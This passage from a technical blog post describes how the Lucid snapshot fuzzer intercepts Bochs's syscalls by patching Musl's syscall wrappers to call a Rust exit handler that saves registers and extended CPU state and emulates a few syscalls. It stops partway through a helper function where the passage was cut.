syscalls. We do not want Bochs to be capable of escaping its sandbox or retrieving any data from outside of our environment. So today we’ll get into the implementation details of my first stab at Bochs-to-fuzzer context switching to handle syscalls. In the future we will also need to implement context switching from fuzzer-to-Bochs as well, but for now let’s focus on syscalls.

This fuzzer was conceived of and implemented originally by Brandon Falk.

There will be no repo changes with this post.

Syscalls

Syscalls are a way for userland to voluntarily context switch to kernel-mode in order to use some kernel-provided utility or function. Context switching simply means changing the context in which code is executing. When you’re adding integers or reading/writing memory, your process is executing in user-mode within your process’s virtual address space. But if you want to open a socket or a file, you need the kernel’s help. To do this, you make a syscall, which tells the processor to switch execution modes from user-mode to kernel-mode. In order to leave user-mode, go to kernel-mode, and then return to user-mode, a lot of care must be taken to accurately save the execution state at every step. Once you try to execute a syscall, the first thing the OS has to do is save your current execution state before it starts executing your requested kernel code, so that once the kernel is done with your request, it can return gracefully to executing your user-mode process.
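
To make that transition concrete, here is what a raw syscall looks like on x86_64 Linux with no libc wrapper in the way. This is just a standalone Rust illustration (it is not code from Lucid or Musl): the syscall number goes in rax, the first three arguments go in rdi, rsi, and rdx, and the kernel is free to clobber rcx and r11:

use std::arch::asm;

fn main() {
    let msg = b"hello from a raw syscall\n";
    let ret: usize;

    unsafe {
        asm!(
            "syscall",
            // rax holds the syscall number on entry (1 == write on x86_64
            // Linux) and the return value on exit
            inout("rax") 1usize => ret,
            in("rdi") 1usize,        // arg1: fd 1 (stdout)
            in("rsi") msg.as_ptr(),  // arg2: pointer to the buffer
            in("rdx") msg.len(),     // arg3: length of the buffer
            // the syscall instruction itself clobbers rcx and r11
            out("rcx") _,
            out("r11") _,
        );
    }

    // On success, write returns the number of bytes written
    assert_eq!(ret, msg.len());
}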

Context-switching can be thought of as switching from executing one process to another. In our case, we’re switching from Bochs execution to Lucid execution. Bochs is doing its thing, reading/writing memory, doing arithmetic, etc., but when it needs the kernel’s help it attempts to make a syscall. When this occurs we need to:

  1. recognize that Bochs is trying to syscall (weirdly, this isn’t always easy to do)
  2. intercept execution and redirect to the appropriate code path
  3. save Bochs’ execution state
  4. execute our Lucid logic in place of the kernel, think of Lucid as Bochs’ kernel
  5. return gracefully to Bochs by restoring its state

C Library

Normally programmers don’t have to worry about making syscalls directly. They instead use functions that are defined and implemented in a C library, and it’s these functions that actually make the syscalls. You can think of these functions as wrappers around a syscall. For instance, if you use the C library function for open, you’re not directly making a syscall; you’re calling into the library’s open function, and that function is the one emitting a syscall instruction that actually performs the context switch into the kernel. Doing things this way takes a lot of the portability work off of the programmer’s shoulders because the guts of the library functions perform all of the conditional checks for environmental variables and execute accordingly. Programmers just call the open function and don’t have to worry about things like syscall numbers, error handling, etc., as those things are kept abstracted and uniform in the code exported to the programmer.

This provides a nice chokepoint for our purposes, since Bochs programmers also use C library functions instead of invoking syscalls directly. When Bochs wants to make a syscall, it’s going to call a C library function. This gives us an opportunity to intercept these syscalls before they are made. We can insert our own logic into these functions that check to see whether or not Bochs is executing under Lucid, if it is, we can insert logic that directs execution to Lucid instead of the kernel. In pseudocode we can achieve something like the following:

fn syscall()
  if lucid:
    lucid_syscall()
  else:
    normal_syscall()

Musl

Musl is a C library that is meant to be “lightweight.” This gives us some simplicity to work with vs. something like Glibc, which is a monstrosity and an affront to God. Importantly, Musl has a great reputation for static linking, which is what we need when we build our static PIE Bochs. So the idea here is that we can manually alter the Musl code to change how the syscall-invoking wrapper functions work, so that we can hijack execution in a way that context-switches into Lucid rather than the kernel.

In this post we’ll be working with Musl 1.2.4 which is the latest version as of today.

Baby Steps

Instead of jumping straight into Bochs, we’ll be using a test program for the purposes of developing our first context-switching routines. This is just easier. The test program is this:

#include <stdio.h>
#include <unistd.h>
#include <lucid.h>

int main(int argc, char *argv[]) {
    printf("Argument count: %d\n", argc);
    printf("Args:\n");
    for (int i = 0; i < argc; i++) {
        printf("   -%s\n", argv[i]);
    }

    size_t iters = 0;
    while (1) {
        printf("Test alive!\n");
        sleep(1);
        iters++;

        if (iters == 5) { break; }
    }

    printf("g_lucid_ctx: %p\n", g_lucid_ctx);
}

The program will just tell us its argument count and each argument, stay alive for ~5 seconds, and then print the memory address of a Lucid execution context data structure. This data structure will be allocated and initialized by Lucid if the program is running under Lucid, and it will be NULL otherwise. So how do we accomplish this?

Execution Context Tracking

Our problem is that we need a globally accessible way for the program we load (eventually Bochs) to tell whether or not it’s running under Lucid or running as normal. We also have to provide many data structures and function addresses to Bochs, so we need a vehicle to do that.

What I’ve done is create my own header file, lucid.h, and place it in Musl. This file defines all of the Lucid-specific data structures we need Bochs to have access to when it’s compiled against Musl. So in the header file right now we’ve defined a lucid_ctx data structure, and we’ve also created a global instance of one called g_lucid_ctx:

// An execution context definition that we use to switch contexts between the
// fuzzer and Bochs. This should contain all of the information we need to track
// all of the mutable state between snapshots that we need such as file data.
// This has to be consistent with LucidContext in context.rs
typedef struct lucid_ctx {
    // This must always be the first member of this struct
    size_t exit_handler;
    int save_inst;
    size_t save_size;
    size_t lucid_save_area;
    size_t bochs_save_area;
    struct register_bank register_bank;
    size_t magic;
} lucid_ctx_t;

// Pointer to the global execution context, if running inside Lucid, this will
// point to a struct lucid_ctx_t inside the Fuzzer
lucid_ctx_t *g_lucid_ctx;

Program Start Under Lucid

So in Lucid’s main function right now we do the following:

  • Load Bochs
  • Create an execution context
  • Jump to Bochs’ entry point and start executing

When we jump to Bochs’ entry point, one of the earliest functions called is a Musl function called _dlstart_c, located in the source file dlstart.c. Right now, we create that global execution context in Lucid on the heap and then pass its address in the arbitrarily chosen r15 register. This whole function will have to change eventually, because in the future we’ll want to context switch from Lucid to Bochs to perform this, but for now this is all we do:

pub fn start_bochs(bochs: Bochs, context: Box<LucidContext>) {
    // rdx: we have to clear this register as the ABI specifies that exit
    // hooks are set when rdx is non-null at program start
    //
    // rax: arbitrarily used as a jump target to the program entry
    //
    // rsp: Rust does not allow you to use 'rsp' explicitly with in(), so we
    // have to manually set it with a `mov`
    //
    // r15: holds a pointer to the execution context, if this value is non-
    // null, then Bochs learns at start time that it is running under Lucid
    //
    // We don't really care about execution order as long as we specify clobbers
    // with out/lateout, that way the compiler doesn't allocate a register we 
    // then immediately clobber
    unsafe {
        asm!(
            "xor rdx, rdx",
            "mov rsp, {0}",
            "mov r15, {1}",
            "jmp rax",
            in(reg) bochs.rsp,
            in(reg) Box::into_raw(context),
            in("rax") bochs.entry,
            lateout("rax") _,   // Clobber (inout so no conflict with in)
            out("rdx") _,       // Clobber
            out("r15") _,       // Clobber
        );
    }
}

So when we jump to Bochs entry point having come from Lucid, r15 should hold the address of the execution context. In _dlstart_c, we can check r15 and act accordingly. Here are those additions I made to Musl’s start routine:

hidden void _dlstart_c(size_t *sp, size_t *dynv)
{
	// The start routine is handled in inline assembly in arch/x86_64/crt_arch.h
	// so we can just do this here. That function logic clobbers only a few
	// registers, so we can have the Lucid loader pass the address of the 
	// Lucid context in r15, this is obviously not the cleanest solution but
	// it works for our purposes
	size_t r15;
	__asm__ __volatile__(
		"mov %%r15, %0" : "=r"(r15)
	);

	// If r15 was not 0, set the global context address for the g_lucid_ctx that
	// is in the Rust fuzzer
	if (r15 != 0) {
		g_lucid_ctx = (lucid_ctx_t *)r15;

		// We have to make sure this is true, we rely on this
		if ((void *)g_lucid_ctx != (void *)&g_lucid_ctx->exit_handler) {
			__asm__ __volatile__("int3");
		}
	}

	// We didn't get a g_lucid_ctx, so we can just run normally
	else {
		g_lucid_ctx = (lucid_ctx_t *)0;
	}

When this function is called, r15 remains untouched by the earliest Musl logic. So we use inline assembly to extract the value into a variable called r15 and check it for data. If it has data, we set the global context variable to the address in r15; otherwise we explicitly set it to NULL and run as normal. Now, with the global set, we can do runtime checks for our environment and conditionally call into either the real kernel or Lucid.

Lobotomizing Musl Syscalls

Now with our global set, it’s time to edit the functions responsible for making syscalls. Musl is very well organized so finding the syscall invoking logic was not too difficult. For our target architecture, which is x86_64, those syscall invoking functions are in arch/x86_64/syscall_arch.h. They are organized by how many arguments the syscall takes:

static __inline long __syscall0(long n)
{
	unsigned long ret;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n) : "rcx", "r11", "memory");
	return ret;
}

static __inline long __syscall1(long n, long a1)
{
	unsigned long ret;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1) : "rcx", "r11", "memory");
	return ret;
}

static __inline long __syscall2(long n, long a1, long a2)
{
	unsigned long ret;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2)
						  : "rcx", "r11", "memory");
	return ret;
}

static __inline long __syscall3(long n, long a1, long a2, long a3)
{
	unsigned long ret;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
						  "d"(a3) : "rcx", "r11", "memory");
	return ret;
}

static __inline long __syscall4(long n, long a1, long a2, long a3, long a4)
{
	unsigned long ret;
	register long r10 __asm__("r10") = a4;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
						  "d"(a3), "r"(r10): "rcx", "r11", "memory");
	return ret;
}

static __inline long __syscall5(long n, long a1, long a2, long a3, long a4, long a5)
{
	unsigned long ret;
	register long r10 __asm__("r10") = a4;
	register long r8 __asm__("r8") = a5;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
						  "d"(a3), "r"(r10), "r"(r8) : "rcx", "r11", "memory");
	return ret;
}

static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
	unsigned long ret;
	register long r10 __asm__("r10") = a4;
	register long r8 __asm__("r8") = a5;
	register long r9 __asm__("r9") = a6;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
						  "d"(a3), "r"(r10), "r"(r8), "r"(r9) : "rcx", "r11", "memory");
	return ret;
}

For syscalls, there is a well-defined calling convention. A syscall takes a “syscall number”, which determines what syscall you want, in rax, and then the next n parameters are passed in via the registers in this order: rdi, rsi, rdx, r10, r8, and r9.

This is pretty intuitive, but the syntax is a bit mystifying; for example, on those __asm__ __volatile__ ("syscall" ...) lines, it’s kind of hard to see what’s going on. Let’s take the most convoluted function, __syscall6, and break down all the syntax. We can think of the assembly syntax as a format string, like for printing, but for emitting code instead:

  • unsigned long ret is where we will store the result of the syscall to indicate whether or not it was a success. In the raw assembly, we can see that there is a : followed by "=a"(ret); this first set of parameters after the initial colon indicates output operands. We are saying: please store the result left in eax (symbolized in the syntax as a) into the variable ret.
  • The next series of params after the next colon are input operands. "a"(n) is saying: place the function argument n, which is the syscall number, into eax, which is again symbolized as a. Next, a1 is stored in rdi, which is symbolized as D, and so forth.
  • Arguments 4-6 are placed in registers above; for instance, the syntax register long r10 __asm__("r10") = a4; is a strong compiler hint to store a4 into r10. And then later, "r"(r10) says to pass the variable r10 in a general purpose register (which is already satisfied, since it’s pinned to r10).
  • The last set of colon-separated values are known as “clobbers”. These tell the compiler what our syscall is expected to corrupt. The syscall calling convention specifies that rcx, r11, and memory may be overwritten by the kernel.

With the syntax explained, we can see what is taking place. The job of these functions is to translate the function call into a syscall. The calling convention for functions, known as the System V ABI, is different from that of a syscall; the register utilization differs. So when we call __syscall6 and pass its arguments, each argument has to end up in the following register for the syscall:

  • n → rax
  • a1 → rdi
  • a2 → rsi
  • a3 → rdx
  • a4 → r10
  • a5 → r8
  • a6 → r9

So the compiler will take those function args from the System V ABI and translate them into the syscall via the assembly that we explained above. So now these are the functions we need to edit so that we don’t emit that syscall instruction and instead call into Lucid.

Conditionally Calling Into Lucid

So we need a way, in these function bodies, to call into Lucid instead of emitting syscall instructions. To do so, we need to define our own calling convention; for now I’ve been using the following:

  • r15: contains the address of the global Lucid execution context
  • r14: contains an “exit reason” which is just an enum explaining why we are context switching
  • r13: is the base address of the register bank structure of the Lucid execution context, we need this memory section to store our register values to save our state when we context switch
  • r12: stores the address of the “exit handler” which is the function to call to context switch

This will no doubt change some as we add more features/functionality. I should also note that it is the function’s responsibility to preserve these values according to the ABI, so the function’s caller expects that they won’t change during a function call, and yet we are changing them. That’s OK, because in the function where we use them, we are marking them as clobbers, remember? So the compiler is aware that they change. What the compiler is going to do now is, before it executes any code, push those registers onto the stack to save them, and then before exiting, pop them back into the registers so that the caller gets back the expected values. So we’re free to use them.
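
As a quick aside, here is a tiny standalone Rust illustration (not Lucid code) of that compiler behavior: because r12-r15 are callee-saved in the System V ABI, listing them as clobbers forces the compiler to emit push/pop pairs in the prologue/epilogue so the caller gets its original values back:

use std::arch::asm;

// Illustration only: scribble over the callee-saved registers our calling
// convention borrows; the clobber declarations make the compiler save and
// restore them around this function
#[inline(never)]
fn clobber_callee_saved() {
    unsafe {
        asm!(
            "xor r12, r12",
            "xor r13, r13",
            "xor r14, r14",
            "xor r15, r15",
            out("r12") _,
            out("r13") _,
            out("r14") _,
            out("r15") _,
        );
    }
}

fn main() {
    clobber_callee_saved();
    println!("back in main with the callee-saved registers intact");
}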

So to alter the functions, I changed the function logic to first check whether we have a global Lucid execution context; if we do not, we execute the normal Musl function. You can see that here, as I’ve moved the normal function logic out to a separate function called __syscall6_original:

static __inline long __syscall6_original(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
	unsigned long ret;
	register long r10 __asm__("r10") = a4;
	register long r8  __asm__("r8")  = a5;
	register long r9  __asm__("r9")  = a6;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2), "d"(a3), "r"(r10),
							"r"(r8), "r"(r9) : "rcx", "r11", "memory");

	return ret;
}

static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
	if (!g_lucid_ctx) { return __syscall6_original(n, a1, a2, a3, a4, a5, a6); }

However, if we are running under Lucid, I set up our calling convention by explicitly setting the registers r12-r15 in accordance with what we expect to find in them when we context-switch to Lucid.

static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
    if (!g_lucid_ctx) { return __syscall6_original(n, a1, a2, a3, a4, a5, a6); }
	
    register long ret;
    register long r12 __asm__("r12") = (size_t)(g_lucid_ctx->exit_handler);
    register long r13 __asm__("r13") = (size_t)(&g_lucid_ctx->register_bank);
    register long r14 __asm__("r14") = SYSCALL;
    register long r15 __asm__("r15") = (size_t)(g_lucid_ctx);

Now with our calling convention set up, we can then use inline assembly as before. Notice we’ve replaced the syscall instruction with call r12, calling our exit handler as if it’s a normal function:

    __asm__ __volatile__ (
        "mov %1, %%rax\n\t"
        "mov %2, %%rdi\n\t"
        "mov %3, %%rsi\n\t"
        "mov %4, %%rdx\n\t"
        "mov %5, %%r10\n\t"
        "mov %6, %%r8\n\t"
        "mov %7, %%r9\n\t"
        "call *%%r12\n\t"
        "mov %%rax, %0\n\t"
        : "=r" (ret)
        : "r" (n), "r" (a1), "r" (a2), "r" (a3), "r" (a4), "r" (a5), "r" (a6),
          "r" (r12), "r" (r13), "r" (r14), "r" (r15)
        : "rax", "rcx", "r11", "memory"
    );

    return ret;

So now we’re calling the exit handler instead of syscalling into the kernel, and all of the registers are set up as if we were syscalling. We’ve also got our calling convention registers set up. Let’s see what happens when we land on the exit handler, a function that is implemented in Rust inside Lucid. We are jumping from Bochs code directly to Lucid code!

Implementing a Context Switch

The first thing we need to do is create a function body for the exit handler. In Rust, we can make the function visible to Bochs (via our edited Musl) by declaring the function as an extern C function and giving it a label in inline assembly as such:

extern "C" { fn exit_handler(); }
global_asm!(
    ".global exit_handler",
    "exit_handler:",

So this function is what Bochs will jump to when it tries to syscall under Lucid. The first thing we need to consider is that we need to keep track of Bochs’ state the way the kernel would upon entry to the context switching routine, so the first thing we’ll want to save off is the general purpose registers. By doing this, we preserve the state of the registers but also free them up for our own use: since we save them first, we’re then free to use them. Remember that our calling convention uses r13 to store the base address of the execution context’s register bank:

#[repr(C)]
#[derive(Default, Clone)]
pub struct RegisterBank {
    pub rax:    usize,
    rbx:        usize,
    rcx:        usize,
    pub rdx:    usize,
    pub rsi:    usize,
    pub rdi:    usize,
    rbp:        usize,
    rsp:        usize,
    pub r8:     usize,
    pub r9:     usize,
    pub r10:    usize,
    r11:        usize,
    r12:        usize,
    r13:        usize,
    r14:        usize,
    r15:        usize,
}

We can save the register values then by doing this:

// Save the GPRS to memory
"mov [r13 + 0x0], rax",
"mov [r13 + 0x8], rbx",
"mov [r13 + 0x10], rcx",
"mov [r13 + 0x18], rdx",
"mov [r13 + 0x20], rsi",
"mov [r13 + 0x28], rdi",
"mov [r13 + 0x30], rbp",
"mov [r13 + 0x38], rsp",
"mov [r13 + 0x40], r8",
"mov [r13 + 0x48], r9",
"mov [r13 + 0x50], r10",
"mov [r13 + 0x58], r11",
"mov [r13 + 0x60], r12",
"mov [r13 + 0x68], r13",
"mov [r13 + 0x70], r14",
"mov [r13 + 0x78], r15",

This saves the register values into the register bank in memory for preservation. Next, we’ll want to preserve the CPU’s flags; luckily there is a single instruction for this purpose, pushfq, which pushes the flag values onto the stack.

We’re using a pure assembly stub right now, but we’d like to start using Rust at some point, and that point is now. We have saved all the state we can for now, and it’s time to call into a real Rust function that will make programming and implementation easier. To call into a function though, remember that we need to set up the register values to adhere to the function calling ABI. Two pieces of data that we want to be accessible are the execution context and the reason why we exited; remember, those are in r15 and r14 respectively. So we can simply place those into the registers used for passing function arguments and call into a Rust function called lucid_handler.

// Save the CPU flags
"pushfq",

// Set up the function arguments for lucid_handler according to ABI
"mov rdi, r15", // Put the pointer to the context into RDI
"mov rsi, r14", // Put the exit reason into RSI

// At this point, we've been called into by Bochs, this should mean that 
// at the beginning of our exit_handler, rsp was only 8-byte aligned and
// thus, by ABI, we cannot legally call into a Rust function since to do so
// requires rsp to be 16-byte aligned. Luckily, `pushfq` just 16-byte
// aligned the stack for us and so we are free to `call`
"call lucid_handler",

So now, we are free to execute real Rust code! Here is lucid_handler as of now:

// This is where the actual logic is for handling the Bochs exit, we have to 
// use no_mangle here so that we can call it from the assembly blob. We need
// to see why we've exited and dispatch to the appropriate function
#[no_mangle]
fn lucid_handler(context: *mut LucidContext, exit_reason: i32) {
    // We have to make sure this bad boy isn't NULL 
    if context.is_null() {
        println!("LucidContext pointer was NULL");
        fatal_exit();
    }

    // Ensure that we have our magic value intact, if this is wrong, then we 
    // are in some kind of really bad state and just need to die
    let magic = LucidContext::ptr_to_magic(context);
    if magic != CTX_MAGIC {
        println!("Invalid LucidContext Magic value: 0x{:X}", magic);
        fatal_exit();
    }

    // Before we do anything else, save the extended state
    let save_inst = LucidContext::ptr_to_save_inst(context);
    if save_inst.is_err() {
        println!("Invalid Save Instruction");
        fatal_exit();
    }
    let save_inst = save_inst.unwrap();

    // Get the save area
    let save_area =
        LucidContext::ptr_to_save_area(context, SaveDirection::FromBochs);

    if save_area == 0 || save_area % 64 != 0 {
        println!("Invalid Save Area");
        fatal_exit();
    }

    // Determine save logic
    match save_inst {
        SaveInst::XSave64 => {
            // Retrieve XCR0 value, this will serve as our save mask
            let xcr0 = unsafe { _xgetbv(0) } as u64;

            // Call xsave to save the extended state to Bochs save area
            unsafe { _xsave64(save_area as *mut u8, xcr0); }             
        },
        SaveInst::FxSave64 => {
            // Call fxsave to save the extended state to Bochs save area
            unsafe { _fxsave64(save_area as *mut u8); }
        },
        _ => (), // NoSave
    }

    // Try to convert the exit reason into BochsExit
    let exit_reason = BochsExit::try_from(exit_reason);
    if exit_reason.is_err() {
        println!("Invalid Bochs Exit Reason");
        fatal_exit();
    }
    let exit_reason = exit_reason.unwrap();
    
    // Determine what to do based on the exit reason
    match exit_reason {
        BochsExit::Syscall => {
            syscall_handler(context);
        },
    }

    // Restore extended state, determine restore logic
    match save_inst {
        SaveInst::XSave64 => {
            // Retrieve XCR0 value, this will serve as our save mask
            let xcr0 = unsafe { _xgetbv(0) } as u64;

            // Call xrstor to restore the extended state from Bochs save area
            unsafe { _xrstor64(save_area as *const u8, xcr0); }             
        },
        SaveInst::FxSave64 => {
            // Call fxrstor to restore the extended state from Bochs save area
            unsafe { _fxrstor64(save_area as *const u8); }
        },
        _ => (), // NoSave
    }
}

There are a few important pieces here to discuss.

Extended State

Let’s start with this concept of the save area. What is that? Well, we already have the general purpose registers and our CPU flags saved, but there is what’s called an “extended state” of the processor that we haven’t saved. This can include the floating-point registers, vector registers, and other state information used by the processor to support advanced execution features like SIMD (Single Instruction, Multiple Data) instructions, encryption, and other things like control registers. Is this important? It’s hard to say; we don’t know wtf Bochs will do, and it might count on these being preserved across function calls, so I thought we’d go ahead and do it.

To save this state, you just execute the appropriate saving instruction for your CPU. To do this somewhat dynamically at runtime, I just query the processor for (at least) two saving instructions to see if they’re available; if they’re not, we don’t support anything else for now. So when we create the execution context initially, we determine what save instruction we’ll need and store that answer in the execution context. Then, on a context switch, we can dynamically use the appropriate extended state saving function. This works because we don’t use any of the extended state in lucid_handler yet, so it’s still preserved. You can see how I checked during context initialization here:

pub fn new() -> Result<Self, LucidErr> {
        // Check for what kind of features are supported we check from most 
        // advanced to least
        let save_inst = if std::is_x86_feature_detected!("xsave") {
            SaveInst::XSave64
        } else if std::is_x86_feature_detected!("fxsr") {
            SaveInst::FxSave64
        } else {
            SaveInst::NoSave
        };

        // Get save area size
        let save_size: usize = match save_inst {
            SaveInst::NoSave => 0,
            _ => calc_save_size(),
        };

The way this works is that the processor takes a pointer to the memory where you want the state saved, along with a mask of which specific state components you want saved. I just maxed out the amount of state I want saved and asked the CPU how much memory that would require:

// Standalone function to calculate the size of the save area for saving the 
// extended processor state based on the current processor's features. `cpuid` 
// will return the save area size based on the value of the XCR0 when ECX==0
// and EAX==0xD. The value returned to EBX is based on the current features
// enabled in XCR0, while the value returned in ECX is the largest size it
// could be based on CPU capabilities. So out of an abundance of caution we use
// the ECX value. We have to preserve EBX or rustc gets angry at us. We are
// assuming that the fuzzer and Bochs do not modify the XCR0 at any time.  
fn calc_save_size() -> usize {
    let save: usize;
    unsafe {
        asm!(
            "push rbx",
            "mov rax, 0xD",
            "xor rcx, rcx",
            "cpuid",
            "pop rbx",
            out("rax") _,       // Clobber
            out("rcx") save,    // Save the max size
            out("rdx") _,       // Clobbered by CPUID output (w eax)
        );
    }

    // Round up to the nearest page size
    (save + PAGE_SIZE - 1) & !(PAGE_SIZE - 1)
}
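
The post doesn’t show the mapping of the save area itself, but that step could look roughly like the sketch below, which uses mmap from the libc crate (a hypothetical illustration, not the fuzzer’s real allocation code). mmap hands back page-aligned memory, which also satisfies the 64-byte alignment that xsave/fxsave require:

use std::ptr;

// Hypothetical sketch: map an anonymous, page-aligned buffer to serve as an
// extended-state save area; the real allocation code isn't shown in the post
fn map_save_area(save_size: usize) -> Result<usize, ()> {
    let addr = unsafe {
        libc::mmap(
            ptr::null_mut(),                         // let the kernel pick the address
            save_size,                               // already page-aligned by calc_save_size
            libc::PROT_READ | libc::PROT_WRITE,      // readable and writable, never executable
            libc::MAP_PRIVATE | libc::MAP_ANONYMOUS, // not backed by any file
            -1,
            0,
        )
    };

    if addr == libc::MAP_FAILED {
        return Err(());
    }

    Ok(addr as usize)
}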

I page-align the result, map that memory during execution context initialization, and save the memory address to the execution state. Now, at run time in lucid_handler, we can save the extended state:

// Determine save logic
    match save_inst {
        SaveInst::XSave64 => {
            // Retrieve XCR0 value, this will serve as our save mask
            let xcr0 = unsafe { _xgetbv(0) } as u64;

            // Call xsave to save the extended state to Bochs save area
            unsafe { _xsave64(save_area as *mut u8, xcr0); }             
        },
        SaveInst::FxSave64 => {
            // Call fxsave to save the extended state to Bochs save area
            unsafe { _fxsave64(save_area as *mut u8); }
        },
        _ => (), // NoSave
    }

Right now, the only exit reason we handle is a syscall, so we invoke our syscall handler and then restore the extended state before returning to the exit_handler assembly stub:

// Determine what to do based on the exit reason
    match exit_reason {
        BochsExit::Syscall => {
            syscall_handler(context);
        },
    }

    // Restore extended state, determine restore logic
    match save_inst {
        SaveInst::XSave64 => {
            // Retrieve XCR0 value, this will serve as our save mask
            let xcr0 = unsafe { _xgetbv(0) } as u64;

            // Call xrstor to restore the extended state from Bochs save area
            unsafe { _xrstor64(save_area as *const u8, xcr0); }             
        },
        SaveInst::FxSave64 => {
            // Call fxrstor to restore the extended state from Bochs save area
            unsafe { _fxrstor64(save_area as *const u8); }
        },
        _ => (), // NoSave
    }

Let’s see how we handle syscalls.

Implementing Syscalls

When we run the test program normally, not under Lucid, we get the following output:

Argument count: 1
Args:
   -./test
Test alive!
Test alive!
Test alive!
Test alive!
Test alive!
g_lucid_ctx: 0

And when we run it with strace, we can see what syscalls are made:

execve("./test", ["./test"], 0x7ffca76fee90 /* 49 vars */) = 0
arch_prctl(ARCH_SET_FS, 0x7fd53887f5b8) = 0
set_tid_address(0x7fd53887f7a8)         = 850649
ioctl(1, TIOCGWINSZ, {ws_row=40, ws_col=110, ws_xpixel=0, ws_ypixel=0}) = 0
writev(1, [{iov_base="Argument count: 1", iov_len=17}, {iov_base="\n", iov_len=1}], 2Argument count: 1
) = 18
writev(1, [{iov_base="Args:", iov_len=5}, {iov_base="\n", iov_len=1}], 2Args:
) = 6
writev(1, [{iov_base="   -./test", iov_len=10}, {iov_base="\n", iov_len=1}], 2   -./test
) = 11
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="g_lucid_ctx: 0", iov_len=14}, {iov_base="\n", iov_len=1}], 2g_lucid_ctx: 0
) = 15
exit_group(0)                           = ?
+++ exited with 0 +++

We see that the first two syscalls are involved with process creation; we don’t need to worry about those, since our process is already created and loaded in memory. The other syscalls are ones we’ll need to handle, things like set_tid_address, ioctl, and writev. We don’t worry about exit_group yet, as that will be a fatal exit condition because Bochs shouldn’t exit if we’re snapshot fuzzing.

So we can use our saved register bank to extract the syscall number from rax and dispatch to the appropriate syscall handling logic! You can see that logic here:

// This is where we process Bochs making a syscall. All we need is a pointer to
// the execution context, and we can then access the register bank and all the
// peripheral structures we need
#[allow(unused_variables)]
pub fn syscall_handler(context: *mut LucidContext) {
    // Get a handle to the register bank
    let bank = LucidContext::get_register_bank(context);

    // Check what the syscall number is
    let syscall_no = (*bank).rax;

    // Get the syscall arguments
    let arg1 = (*bank).rdi;
    let arg2 = (*bank).rsi;
    let arg3 = (*bank).rdx;
    let arg4 = (*bank).r10;
    let arg5 = (*bank).r8;
    let arg6 = (*bank).r9;

    match syscall_no {
        // ioctl
        0x10 => {
            //println!("Handling ioctl()...");
            // Make sure the fd is 1, that's all we handle right now?
            if arg1 != 1 {
                println!("Invalid `ioctl` fd: {}", arg1);
                fatal_exit();
            }

            // Check the `cmd` argument
            match arg2 as u64 {
                // Requesting window size
                libc::TIOCGWINSZ => {   
                    // Arg 3 is a pointer to a struct winsize
                    let winsize_p = arg3 as *mut libc::winsize;

                    // If it's NULL, return an error, we don't set errno yet
                    // that's a weird problem
                    // TODO: figure out that whole TLS issue yikes
                    if winsize_p.is_null() {
                        (*bank).rax = usize::MAX;
                        return;
                    }

                    // Deref the raw pointer
                    let winsize = unsafe { &mut *winsize_p };

                    // Set to some constants
                    winsize.ws_row      = WS_ROW;
                    winsize.ws_col      = WS_COL;
                    winsize.ws_xpixel   = WS_XPIXEL;
                    winsize.ws_ypixel   = WS_YPIXEL;

                    // Return success
                    (*bank).rax = 0;
                },
                _ => {
                    println!("Unhandled `ioctl` argument: 0x{:X}", arg1);
                    fatal_exit();
                }
            }
        },
        // writev
        0x14 => {
            //println!("Handling writev()...");
            // Get the fd
            let fd = arg1 as libc::c_int;

            // Make sure it's an fd we handle
            if fd != STDOUT {
                println!("Unhandled writev fd: {}", fd);
            }

            // An accumulator that we return
            let mut bytes_written = 0;

            // Get the iovec count
            let iovcnt = arg3 as libc::c_int;

            // Get the pointer to the iovec
            let mut iovec_p = arg2 as *const libc::iovec;

            // If the pointer was NULL, just return error
            if iovec_p.is_null() {
                (*bank).rax = usize::MAX;
                return;
            }

            // Iterate through the iovecs and write the contents
            green!();
            for _ in 0..iovcnt {
                bytes_written += write_iovec(iovec_p);

                // Advance to the next iovec in the array
                iovec_p = unsafe { iovec_p.add(1) };
            }
            clear!();

            // Update return value
            (*bank).rax = bytes_written;
        },
        // nanosleep
        0x23 => {
            //println!("Handling nanosleep()...");
            (*bank).rax = 0;
        },
        // set_tid_address
        0xDA => {
            //println!("Handling set_tid_address()...");
            // Just return Boch's pid, no need to do anything
            (*bank).rax = BOCHS_PID as usize;
        },
        _ => {
            println!("Unhandled Syscall Number: 0x{:X}", syscall_no);
            fatal_exit();
        }
    }
}
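
One helper referenced above but not shown is write_iovec. Here is a hypothetical reconstruction of what it might look like (the real implementation isn’t in the post): it walks a single iovec, prints its bytes, and reports how many bytes it consumed:

// Hypothetical reconstruction of the write_iovec helper used by the writev
// handler above; not the fuzzer's actual code
fn write_iovec(iovec_p: *const libc::iovec) -> usize {
    // Dereference the iovec to get the base pointer and length
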